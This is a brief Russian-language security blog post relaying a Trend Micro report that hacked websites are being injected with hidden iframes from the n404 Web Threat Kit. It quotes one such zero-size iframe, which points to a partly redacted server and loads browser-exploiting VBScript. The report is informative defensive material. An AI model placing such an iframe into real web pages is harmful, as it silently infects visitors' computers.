Русские хакеры атакуют Интернет

Русские хакеры атакуют Интернет
Компания Тренд Микро сообщает о выходе «обновлений» к n404 Web Threat Kit.
Растет количество взломанных сайтов, на которых размещается тег Iframe следующего содержания:


<iframe src=’http://81.{BLOCKED}.27/go.php?sid=1′ style=’border:0px solid
gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0
SCROLLING=no></iframe>

Код загружает сценарий VBScript и эксплуатирует уязвимость браузера для получения контроля над пользовательским компьютером. Генерация VBScript сценария происходит случайным образом, что существенно затрудняет обнаружение такого когда антивирусными ПО.
Тренд Микро утверждает , что сервер, на котором хостится злонамеренный код принадлежит русской компании.
Security
Alt text

Валерий Марчук

Блог посвящен безопасности и жизни секлаба